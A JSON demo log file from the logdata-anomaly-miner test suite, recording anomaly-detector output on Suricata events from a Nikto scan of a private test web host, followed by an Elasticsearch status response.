"/parser/model/time": 1583349514.380109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46968, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1414354189338696,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1414354189338696, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80", "/parser/model/time": 1583349514.382662, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46970, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.10:100", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.382965, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":268736087642508,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46970, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":268736087642508,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 268736087642508, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46972 -> 192.168.10.154:80", "/parser/model/time": 1583349514.385406, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46972, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.386008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46972, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1931339402763667, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } 
logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/elastic.log000066400000000000000000002130261500476301700320070ustar00rootroot00000000000000{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mDPoLXYBIkOurnXX5Icg","_score":1.0,"_source":{"FromTime":1.607087995611796E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":100,"/parser/model/type_str":14916,"/parser/model/classification":0,"/parser/model/status_code":21,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:06.072Z","ToTime":1.607088005611873E9,"fromtimestamp":"2020-12-04T13:19:55.611Z","totimestamp":"2020-12-04T13:20:05.611Z","version":"1"}}]}} 